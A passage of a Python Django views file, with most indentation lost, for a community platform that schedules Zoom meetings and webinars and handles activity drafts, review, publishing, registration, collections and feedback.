join_url = response['join_url']
sig_name = data['group_name']
toaddrs = emaillist
p1 = Process(target=sendmail, args=(topic, date, start, join_url, sig_name, toaddrs, summary, record))
p1.start()
        # Persist the meeting record
Meeting.objects.create(
mid=response['id'],
topic=data['topic'],
community=community,
sponsor=data['sponsor'],
group_name=data['group_name'],
date=date,
start=start,
end=end,
etherpad=data['etherpad'],
emaillist=emaillist,
timezone=response['timezone'],
agenda=data['agenda'] if 'agenda' in data else '',
host_id=response['host_id'],
join_url=response['join_url'],
start_url=response['start_url'],
user_id=user_id,
group_id=group_id
)
logger.info('{} has created a meeting which mid is {}.'.format(data['sponsor'], response['id']))
logger.info('meeting info: {},{}-{},{}'.format(date, start, end, topic))
        # If cloud recording is enabled, also create a Video record
if record == 'cloud':
Video.objects.create(
mid=response['id'],
topic=data['topic'],
community=community,
group_name=data['group_name'],
agenda=data['agenda'] if 'agenda' in data else ''
)
logger.info('meeting {} was created with auto recording.'.format(response['id']))
        # Build the response
resp = {'code': 201, 'message': '创建成功'}
meeting = Meeting.objects.get(mid=response['id'])
resp['id'] = meeting.id
        t3 = time.time()
        logger.info('total time consumed: {}'.format(t3 - t1))
return JsonResponse(resp)
class MyMeetingsView(GenericAPIView, ListModelMixin):
"""查询我创建的所有会议"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.all().filter(is_delete=0)
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='查询我创建的所有会议')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
queryset = Meeting.objects.filter(is_delete=0, user_id=user_id).order_by('-date', 'start')
if User.objects.get(id=user_id).level == 3:
queryset = Meeting.objects.filter(is_delete=0).order_by('-date', 'start')
return queryset
class AllMeetingsView(GenericAPIView, ListModelMixin):
"""列出所有会议"""
serializer_class = AllMeetingsSerializer
queryset = Meeting.objects.all()
filter_backends = [SearchFilter]
search_fields = ['is_delete', 'group_name', 'sponsor', 'date', 'start', 'end']
permission_classes = (QueryPermission,)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class CollectView(GenericAPIView, ListModelMixin, CreateModelMixin):
"""收藏会议"""
serializer_class = CollectSerializer
queryset = Collect.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
def post(self, request, *args, **kwargs):
user_id = self.request.user.id
meeting_id = self.request.data['meeting']
Collect.objects.create(meeting_id=meeting_id, user_id=user_id)
resp = {'code': 201, 'msg': 'collect successfully'}
return JsonResponse(resp)
def get_queryset(self):
queryset = Collect.objects.filter(user_id=self.request.user.id)
return queryset
class CollectDelView(GenericAPIView, DestroyModelMixin):
"""取消收藏"""
serializer_class = CollectSerializer
queryset = Collect.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
def get_queryset(self):
queryset = Collect.objects.filter(user_id=self.request.user.id)
return queryset
class MyCollectionsView(GenericAPIView, ListModelMixin):
"""我收藏的会议(列表)"""
serializer_class = MeetingListSerializer
queryset = Meeting.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
collection_lst = Collect.objects.filter(user_id=user_id).values_list('meeting', flat=True)
queryset = Meeting.objects.filter(is_delete=0, id__in=collection_lst).order_by('-date', 'start')
return queryset
class ParticipantsView(GenericAPIView, RetrieveModelMixin):
"""查询会议的参会者"""
permission_classes = (QueryPermission,)
def get(self, request, *args, **kwargs):
mid = kwargs.get('mid')
try:
url = "https://api.zoom.us/v2/past_meetings/{}/participants".format(mid)
headers = {
"authorization": "Bearer {}".format(settings.ZOOM_TOKEN)}
r = requests.get(url, headers=headers)
if r.status_code == 200:
return JsonResponse(
{'total_records': r.json()['total_records'], 'participants': r.json()['participants']})
else:
return JsonResponse(r.json())
except Exception as e:
logger.error(e)
            return JsonResponse({'msg': str(e)})
class SponsorsView(GenericAPIView, ListModelMixin):
"""活动发起人列表"""
serializer_class = SponsorSerializer
queryset = User.objects.filter(activity_level=2)
filter_backends = [SearchFilter]
search_fields = ['nickname']
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='活动发起人列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class NonSponsorView(GenericAPIView, ListModelMixin):
"""非活动发起人列表"""
serializer_class = SponsorSerializer
queryset = User.objects.filter(activity_level=1)
filter_backends = [SearchFilter]
search_fields = ['nickname']
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='非活动发起人列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class SponsorAddView(GenericAPIView, CreateModelMixin):
"""批量添加活动发起人"""
queryset = User.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='批量添加活动发起人')
def post(self, request, *args, **kwargs):
ids = self.request.data.get('ids')
ids_list = [int(x) for x in ids.split('-')]
User.objects.filter(id__in=ids_list, activity_level=1).update(activity_level=2)
return JsonResponse({'code': 201, 'msg': '添加成功'})
class SponsorDelView(GenericAPIView, CreateModelMixin):
"""批量删除组成员"""
queryset = GroupUser.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='批量删除活动发起人')
def post(self, request, *args, **kwargs):
ids = self.request.data.get('ids')
ids_list = [int(x) for x in ids.split('-')]
User.objects.filter(id__in=ids_list, activity_level=2).update(activity_level=1)
return JsonResponse({'code': 204, 'msg': '删除成功'})
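# Note: judging from the add/del views above and the checks elsewhere in this
# module, 'activity_level' appears to encode activity permissions
# (1: ordinary user, 2: activity sponsor, 3: activity administrator). This is an
# inference from the queryset filters, not an authoritative definition.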
class SponsorInfoView(GenericAPIView, UpdateModelMixin):
"""修改活动发起人信息"""
serializer_class = SponsorInfoSerializer
queryset = User.objects.filter(activity_level=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='修改活动发起人信息')
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
class DraftsView(GenericAPIView, ListModelMixin):
"""审核列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.filter(is_delete=0, status=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='审核列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class DraftView(GenericAPIView, RetrieveModelMixin):
"""待发布详情"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.filter(is_delete=0, status=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='待发布详情')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class ActivityView(GenericAPIView, CreateModelMixin):
"""创建活动并申请发布"""
serializer_class = ActivitySerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
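    # Illustrative request body; field names come from the handler below, values
    # are made up. Offline activities additionally carry address fields, online
    # activities carry start/end instead:
    #
    #   {
    #       "title": "openEuler meetup",
    #       "date": "2021-08-01",
    #       "activity_type": 1,               # offline/online constant (online = 2 above; offline assumed to be 1)
    #       "synopsis": "short description",  # optional
    #       "poster": 1,
    #       "address": "...",
    #       "detail_address": "...",
    #       "longitude": 116.40,
    #       "latitude": 39.90,
    #       "schedules": [...]                # structure not shown here
    #   }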
@swagger_auto_schema(operation_summary='创建活动并申请发布')
def post(self, request, *args, **kwargs):
data = self.request.data
title = data['title']
date = data['date']
if date < (datetime.datetime.now() + datetime.timedelta(days=1)).strftime('%Y-%m-%d'):
return JsonResponse({'code': 400, 'msg': '请最早提前一天申请活动'})
activity_type = data['activity_type']
synopsis = data['synopsis'] if 'synopsis' in data else None
poster = data['poster']
user_id = self.request.user.id
enterprise = User.objects.get(id=user_id).enterprise
        # Offline activity
if activity_type == offline:
address = data['address']
detail_address = data['detail_address']
longitude = data['longitude']
latitude = data['latitude']
Activity.objects.create(
title=title,
date=date,
activity_type=activity_type,
synopsis=synopsis,
address=address,
detail_address=detail_address,
longitude=longitude,
latitude=latitude,
schedules=json.dumps(data['schedules']),
poster=poster,
user_id=user_id,
status=2,
enterprise=enterprise
)
        # Online activity
if activity_type == online:
start = data['start']
end = data['end']
Activity.objects.create(
title=title,
date=date,
start=start,
end=end,
activity_type=activity_type,
synopsis=synopsis,
schedules=json.dumps(data['schedules']),
poster=poster,
user_id=user_id,
status=2,
enterprise=enterprise
)
return JsonResponse({'code': 201, 'msg': '活动申请发布成功!'})
class ActivitiesView(GenericAPIView, ListModelMixin):
"""活动列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.filter(is_delete=0, status__gt=2).order_by('-date', 'id')
filter_backends = [SearchFilter]
search_fields = ['title', 'enterprise']
@swagger_auto_schema(operation_summary='活动列表')
def get(self, request, *args, **kwargs):
activity_status = self.request.GET.get('activity')
activity_type = self.request.GET.get('activity_type')
if activity_status == 'registering':
self.queryset = self.queryset.filter(status__in=[3, 4])
if activity_status == 'going':
self.queryset = self.queryset.filter(status=4)
if activity_status == 'completed':
self.queryset = self.queryset.filter(status=5)
if activity_type:
try:
if int(activity_type) == 1:
self.queryset = self.queryset.filter(activity_type=1)
if int(activity_type) == 2:
self.queryset = self.queryset.filter(activity_type=2)
if int(activity_type) == 1 and activity_status == 'registering':
self.queryset = self.queryset.filter(activity_type=1, status__in=[3, 4])
if int(activity_type) == 1 and activity_status == 'going':
self.queryset = self.queryset.filter(activity_type=1, status=4)
if int(activity_type) == 1 and activity_status == 'completed':
self.queryset = self.queryset.filter(activity_type=1, status=5)
if int(activity_type) == 2 and activity_status == 'registering':
self.queryset = self.queryset.filter(activity_type=2, status__in=[3, 4])
if int(activity_type) == 2 and activity_status == 'going':
self.queryset = self.queryset.filter(activity_type=2, status=4)
if int(activity_type) == 2 and activity_status == 'completed':
self.queryset = self.queryset.filter(activity_type=2, status=5)
except TypeError:
pass
return self.list(request, *args, **kwargs)
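# Activity status lifecycle, as used by the views above and below (reconstructed
# from the queryset filters, so treat it as a reading aid rather than a spec):
#   1 - draft, 2 - submitted / under review, 3 - published (registering),
#   4 - in progress, 5 - completed; is_delete=1 marks soft-deleted records.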
class RecentActivitiesView(GenericAPIView, ListModelMixin):
"""最近的活动列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.filter(is_delete=0)
filter_backends = [SearchFilter]
search_fields = ['enterprise']
@swagger_auto_schema(operation_summary='最近的活动列表')
def get(self, request, *args, **kwargs):
self.queryset = self.queryset.filter(status__gt=2, date__gt=datetime.datetime.now().strftime('%Y-%m-%d')).order_by('-date', 'id')
return self.list(request, *args, **kwargs)
class SponsorActivitiesView(GenericAPIView, ListModelMixin):
"""活动发起人的活动列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='我(活动发起人)的活动列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
queryset = Activity.objects.filter(is_delete=0, status__gt=2, user_id=self.request.user.id)
return queryset
class ActivityRetrieveView(GenericAPIView, RetrieveModelMixin):
"""查询单个活动"""
serializer_class = ActivityRetrieveSerializer
queryset = Activity.objects.filter(is_delete=0, status__gt=2)
@swagger_auto_schema(operation_summary='查询一个活动')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class ActivityUpdateView(GenericAPIView, UpdateModelMixin):
"""修改一个活动"""
serializer_class = ActivityUpdateSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='修改活动')
def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
mid = Activity.objects.get(id=activity_id).mid
schedules = self.request.data['schedules']
invite.add_panelists(mid, schedules)
return self.update(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
activity_level = User.objects.get(id=user_id).activity_level
queryset = Activity.objects.filter(is_delete=0, status__in=[3, 4], user_id=self.request.user.id)
if activity_level == 3:
queryset = Activity.objects.filter(is_delete=0, status__in=[3, 4])
return queryset
class ActivityPublishView(GenericAPIView, UpdateModelMixin):
"""通过申请"""
queryset = Activity.objects.filter(is_delete=0, status=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='活动过审')
def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
appid = settings.APP_CONF['appid']
secret = settings.APP_CONF['secret']
if activity_id in self.queryset.values_list('id', flat=True):
logger.info('活动id: {}'.format(activity_id))
img_url = gene_wx_code.run(appid, secret, activity_id)
logger.info('生成活动页面二维码: {}'.format(img_url))
sign_url = gene_sign_code.run(appid, secret, activity_id)
logger.info('生成活动签到二维码: {}'.format(sign_url))
Activity.objects.filter(id=activity_id, status=2).update(status=3, wx_code=img_url, sign_url=sign_url)
logger.info('活动通过审核')
activity = Activity.objects.get(id=activity_id)
if activity.activity_type == online:
date = activity.date
title = activity.title
start = activity.start
end = activity.end
synopsis = activity.synopsis
                # Create a Zoom webinar
start_time = (datetime.datetime.strptime(date + start, '%Y-%m-%d%H:%M') - datetime.timedelta(hours=8)).strftime('%Y-%m-%dT%H:%M:%SZ')
duration = int((datetime.datetime.strptime(end, '%H:%M') - datetime.datetime.strptime(start, '%H:%M')).seconds / 60)
data = {
"topic": title,
"start_time": start_time,
"duration": duration,
"agenda": synopsis,
"template_id": settings.WEBINAR_TEMPLATE_ID,
"settings": {
"host_video": True,
"panelists_video": True,
"request_permission_to_unmute_participants": True
}
}
headers = {
"Content-Type": "application/json",
"Authorization": "Bearer {}".format(settings.ZOOM_TOKEN)
}
r = requests.post('https://api.zoom.us/v2/users/{}/webinars'.format(settings.WEBINAR_HOST), headers=headers, data=json.dumps(data))
if r.status_code == 201:
logger.info('创建网络研讨会')
start_url = r.json()['start_url']
join_url = r.json()['join_url']
mid = r.json()['id']
Activity.objects.filter(id=activity_id).update(start_url=start_url, join_url=join_url, mid=mid)
                    # Send the start_url to the sponsor by email
activity = Activity.objects.get(id=activity_id)
date = activity.date
start = activity.start
topic = activity.title
start_url = activity.start_url
password = r.json()['password']
                    summary = activity.synopsis
user = User.objects.get(id=activity.user_id)
email = user.email
send_start_url.run(date, start, topic, start_url, password, summary, email)
logger.info('成功发送主持人地址邮件')
invite.invite_panelists(mid)
logger.info('成功发送嘉宾邀请邮件')
return JsonResponse({'code': 201, 'msg': '活动通过审核,已发布'})
else:
return JsonResponse({'code': 404, 'msg': '无此数据'})
class ActivityRejectView(GenericAPIView, UpdateModelMixin):
"""驳回申请"""
queryset = Activity.objects.filter(is_delete=0, status=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='驳回申请')
def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
if activity_id in self.queryset.values_list('id', flat=True):
Activity.objects.filter(id=activity_id, status=2).update(status=1)
return JsonResponse({'code': 201, 'msg': '活动申请已驳回'})
else:
return JsonResponse({'code': 404, 'msg': '无此数据'})
class ActivityDelView(GenericAPIView, UpdateModelMixin):
"""删除一个活动"""
queryset = Activity.objects.filter(is_delete=0, status__gt=2)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (ActivityAdminPermission,)
@swagger_auto_schema(operation_summary='删除活动')
def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
Activity.objects.filter(id=activity_id).update(is_delete=1)
return JsonResponse({'code': 204, 'msg': '成功删除活动'})
class ActivityDraftView(GenericAPIView, CreateModelMixin):
"""创建活动草案"""
serializer_class = ActivitySerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='创建活动草案')
def post(self, request, *args, **kwargs):
data = self.request.data
title = data['title']
date = data['date']
if date < (datetime.datetime.now() + datetime.timedelta(days=1)).strftime('%Y-%m-%d'):
return JsonResponse({'code': 400, 'msg': '请最早提前一天申请活动'})
activity_type = data['activity_type']
synopsis = data['synopsis'] if 'synopsis' in data else None
poster = data['poster']
user_id = self.request.user.id
enterprise = User.objects.get(id=user_id).enterprise
        # Offline activity
if activity_type == offline:
address = data['address']
detail_address = data['detail_address']
longitude = data['longitude']
latitude = data['latitude']
Activity.objects.create(
title=title,
date=date,
activity_type=activity_type,
synopsis=synopsis,
address=address,
detail_address=detail_address,
longitude=longitude,
latitude=latitude,
schedules=json.dumps(data['schedules']),
poster=poster,
user_id=user_id,
enterprise=enterprise
)
        # Online activity
if activity_type == online:
start = data['start']
end = data['end']
Activity.objects.create(
title=title,
date=date,
start=start,
end=end,
activity_type=activity_type,
synopsis=synopsis,
schedules=json.dumps(data['schedules']),
poster=poster,
user_id=user_id,
enterprise=enterprise
)
return JsonResponse({'code': 201, 'msg': '活动草案创建成功!'})
class ActivitiesDraftView(GenericAPIView, ListModelMixin):
"""活动草案列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='我(活动发起人)的活动草案列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
queryset = Activity.objects.filter(is_delete=0, status=1, user_id=self.request.user.id).order_by('-date', 'id')
return queryset
class SponsorActivityDraftView(GenericAPIView, RetrieveModelMixin, DestroyModelMixin):
"""查询、删除活动草案"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='查询一个活动草案')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
@swagger_auto_schema(operation_summary='删除活动草案')
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
def get_queryset(self):
queryset = Activity.objects.filter(is_delete=0, status=1, user_id=self.request.user.id).order_by('-date', 'id')
return queryset
class DraftUpdateView(GenericAPIView, UpdateModelMixin):
"""修改活动草案"""
serializer_class = ActivityDraftUpdateSerializer
queryset = Activity.objects.filter(is_delete=0, status=1)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
    def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
data = self.request.data
title = data['title']
date = data['date']
activity_type = data['activity_type']
synopsis = data['synopsis'] if 'synopsis' in data else None
poster = data['poster']
user_id = self.request.user.id
if activity_type == offline:
address = data['address']
detail_address = data['detail_address']
longitude = data['longitude']
latitude = data['latitude']
Activity.objects.filter(id=activity_id, user_id=user_id).update(
title=title,
date=date,
activity_type=activity_type,
synopsis=synopsis,
address=address,
detail_address=detail_address,
longitude=longitude,
latitude=latitude,
schedules=json.dumps(data['schedules']),
poster=poster
)
if activity_type == online:
start = data['start']
end = data['end']
Activity.objects.filter(id=activity_id, user_id=user_id).update(
title=title,
date=date,
start=start,
end=end,
activity_type=activity_type,
synopsis=synopsis,
schedules=json.dumps(data['schedules']),
poster=poster
)
return JsonResponse({'code': 201, 'msg': '修改并保存活动草案'})
class DraftPublishView(GenericAPIView, UpdateModelMixin):
"""修改活动草案并申请发布"""
serializer_class = ActivityDraftUpdateSerializer
queryset = Activity.objects.filter(is_delete=0, status=1)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
    def put(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
data = self.request.data
title = data['title']
date = data['date']
activity_type = data['activity_type']
synopsis = data['synopsis'] if 'synopsis' in data else None
poster = data['poster']
user_id = self.request.user.id
if activity_type == offline:
address = data['address']
detail_address = data['detail_address']
longitude = data['longitude']
latitude = data['latitude']
Activity.objects.filter(id=activity_id, user_id=user_id).update(
title=title,
date=date,
activity_type=activity_type,
synopsis=synopsis,
address=address,
detail_address=detail_address,
longitude=longitude,
latitude=latitude,
schedules=json.dumps(data['schedules']),
poster=poster,
status=2
)
if activity_type == online:
start = data['start']
end = data['end']
Activity.objects.filter(id=activity_id, user_id=user_id).update(
title=title,
date=date,
start=start,
end=end,
activity_type=activity_type,
synopsis=synopsis,
schedules=json.dumps(data['schedules']),
poster=poster,
status=2
)
return JsonResponse({'code': 201, 'msg': '申请发布活动'})
class SponsorActivitiesPublishingView(GenericAPIView, ListModelMixin):
"""发布中的活动"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='发布中(个人)的活动')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
queryset = Activity.objects.filter(is_delete=0, status=2, user_id=self.request.user.id).order_by('-date', 'id')
return queryset
class ActivityCollectView(GenericAPIView, CreateModelMixin):
"""收藏活动"""
serializer_class = ActivityCollectSerializer
queryset = ActivityCollect.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='收藏活动')
def post(self, request, *args, **kwargs):
user_id = self.request.user.id
activity_id = self.request.data['activity']
ActivityCollect.objects.create(activity_id=activity_id, user_id=user_id)
return JsonResponse({'code': 201, 'msg': '收藏活动'})
class ActivityCollectDelView(GenericAPIView, DestroyModelMixin):
"""取消收藏活动"""
serializer_class = ActivityCollectSerializer
queryset = ActivityCollect.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='取消收藏活动')
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
def get_queryset(self):
queryset = ActivityCollect.objects.filter(user_id=self.request.user.id)
return queryset
class MyActivityCollectionsView(GenericAPIView, ListModelMixin):
"""我收藏的活动(列表)"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='我收藏的活动')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
collection_lst = ActivityCollect.objects.filter(user_id=user_id).values_list('activity', flat=True)
queryset = Activity.objects.filter(is_delete=0, id__in=collection_lst).order_by('-date', 'id')
return queryset
class ActivityRegisterView(GenericAPIView, CreateModelMixin):
"""活动报名"""
serializer_class = ActivityRegisterSerializer
queryset = ActivityRegister.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='活动报名')
def post(self, request, *args, **kwargs):
data = self.request.data
activity_id = data['activity']
user_id = self.request.user.id
if Activity.objects.filter(id=activity_id, user_id=user_id):
return JsonResponse({'code': 403, 'msg': '不能报名自己发起的活动'})
name = data['name']
telephone = data['telephone']
email = data['email']
company = data['company']
profession = data['profession'] if 'profession' in data else User.objects.get(id=user_id).profession
gitee_name = data['gitee_name'] if 'gitee_name' in data else User.objects.get(id=user_id).gitee_name
register_number = User.objects.get(id=self.request.user.id).register_number
register_number += 1
User.objects.filter(id=self.request.user.id).update(
name=name,
telephone=telephone,
email=email,
company=company,
profession=profession,
gitee_name=gitee_name,
register_number=register_number
)
ActivityRegister.objects.create(activity_id=activity_id, user_id=user_id)
register_number = len(ActivityRegister.objects.filter(user_id=self.request.user.id))
return JsonResponse({'code': 201, 'msg': '报名成功', 'register_number': register_number})
class ApplicantInfoView(GenericAPIView, RetrieveModelMixin):
"""报名者信息详情"""
serializer_class = ApplicantInfoSerializer
queryset = User.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='报名者信息详情')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class ApplicantsInfoView(GenericAPIView, CreateModelMixin):
"""报名者信息列表"""
queryset = ActivityRegister.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='报名者信息列表')
def post(self, request, *args, **kwargs):
data = self.request.data
try:
activity_id = data['activity']
mailto = data['mailto']
if not re.match(r'^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$', mailto):
return JsonResponse({'code': 400, 'msg': '请填入正确的收件邮箱'})
user_id = self.request.user.id
if not Activity.objects.filter(id=activity_id, user_id=user_id) and User.objects.get(
id=user_id).activity_level != 3:
return JsonResponse({'code': 403, 'msg': '无权查看该活动的报名列表'})
self.queryset = ActivityRegister.objects.filter(activity_id=activity_id)
send_applicants_info.run(self.queryset, mailto)
return JsonResponse({'code': '200', 'msg': '已发送活动报名信息'})
except KeyError:
return JsonResponse({'code': 400, 'msg': '需要activity和mailto两个参数'})
class RegisterActivitiesView(GenericAPIView, ListModelMixin):
"""我报名的活动列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='我报名的活动列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
register_lst = ActivityRegister.objects.filter(user_id=user_id).values_list('activity')
queryset = Activity.objects.filter(is_delete=0, id__in=register_lst).order_by('-date', 'id')
return queryset
class FeedbackView(GenericAPIView, CreateModelMixin):
"""意见反馈"""
serializer_class = FeedbackSerializer
queryset = Feedback.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='意见反馈')
def post(self, request, *args, **kwargs):
data = self.request.data
try:
feedback_type = data['feedback_type']
feedback_content = data['feedback_content']
feedback_email = data['feedback_email']
if not re.match(r'^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$', feedback_email):
return JsonResponse({'code': 400, 'msg': '请填入正确的收件邮箱'})
user_id = self.request.user.id
Feedback.objects.create(
feedback_type=feedback_type,
feedback_content=feedback_content,
feedback_email=feedback_email,
user_id=user_id
)
if feedback_type == 1:
feedback_type = '问题反馈'
if feedback_type == 2:
feedback_type = '产品建议'
send_feedback.run(feedback_type, feedback_email, feedback_content)
return JsonResponse({'code': 201, 'msg': '反馈意见已收集'})
except KeyError:
return JsonResponse(
{'code': 400, 'msg': 'feedback_type, feedback_content and feedback_email are all required!'})
class CountActivitiesView(GenericAPIView, ListModelMixin):
"""各类活动计数"""
queryset = Activity.objects.filter(is_delete=0, status__gt=2).order_by('-date', 'id')
filter_backends = [SearchFilter]
search_fields = ['title', 'enterprise']
@swagger_auto_schema(operation_summary='各类活动计数')
def get(self, request, *args, **kwargs):
search = self.request.GET.get('search')
activity_type = self.request.GET.get('activity_type')
if search and not activity_type:
self.queryset = self.queryset.filter(Q(title__icontains=search) | Q(enterprise__icontains=search))
if activity_type:
try:
if int(activity_type) == 1:
self.queryset = self.queryset.filter(activity_type=1)
if int(activity_type) == 2:
self.queryset = self.queryset.filter(activity_type=2)
if int(activity_type) == 1 and search:
self.queryset = self.queryset.filter(activity_type=1).filter(
Q(title__icontains=search) | Q(enterprise__icontains=search))
if int(activity_type) == 2 and search:
self.queryset = self.queryset.filter(activity_type=2).filter(
Q(title__icontains=search) | Q(enterprise__icontains=search))
except TypeError:
pass
all_activities_count = len(self.queryset.filter(is_delete=0, status__gt=2).values())
registering_activities_count = len(self.queryset.filter(is_delete=0, status__in=[3, 4]).values())
going_activities_count = len(self.queryset.filter(is_delete=0, status=4).values())
completed_activities_count = len(self.queryset.filter(is_delete=0, status=5).values())
res = {'all_activities_count': all_activities_count,
'registering_activities_count': registering_activities_count,
'going_activities_count': going_activities_count,
'completed_activities_count': completed_activities_count}
return JsonResponse(res)
class MyCountsView(GenericAPIView, ListModelMixin):
"""我的各类计数"""
queryset = Activity.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='我的各类计数')
def get(self, request, *args, **kwargs):
user_id = self.request.user.id
user = User.objects.get(id=user_id)
level = user.level
activity_level = user.activity_level
# shared
collected_meetings_count = len(Meeting.objects.filter(is_delete=0, id__in=(
Collect.objects.filter(user_id=user_id).values_list('meeting_id', flat=True))).values())
collected_activities_count = len(Activity.objects.filter(is_delete=0, id__in=(
ActivityCollect.objects.filter(user_id=user_id).values_list('activity_id', flat=True))).values())
res = {'collected_meetings_count': collected_meetings_count,
'collected_activities_count': collected_activities_count}
# permission limited
if level == 2:
created_meetings_count = len(Meeting.objects.filter(is_delete=0, user_id=user_id).values())
res['created_meetings_count'] = created_meetings_count
if level == 3:
created_meetings_count = len(Meeting.objects.filter(is_delete=0).values())
res['created_meetings_count'] = created_meetings_count
if activity_level < 3:
registerd_activities_count = len(Activity.objects.filter(is_delete=0, status__gt=2, id__in=(
ActivityRegister.objects.filter(user_id=user_id).values_list('activity_id', flat=True))).values())
res['registerd_activities_count'] = registerd_activities_count
if activity_level == 2:
published_activities_count = len(
Activity.objects.filter(is_delete=0, status__gt=2, user_id=user_id).values())
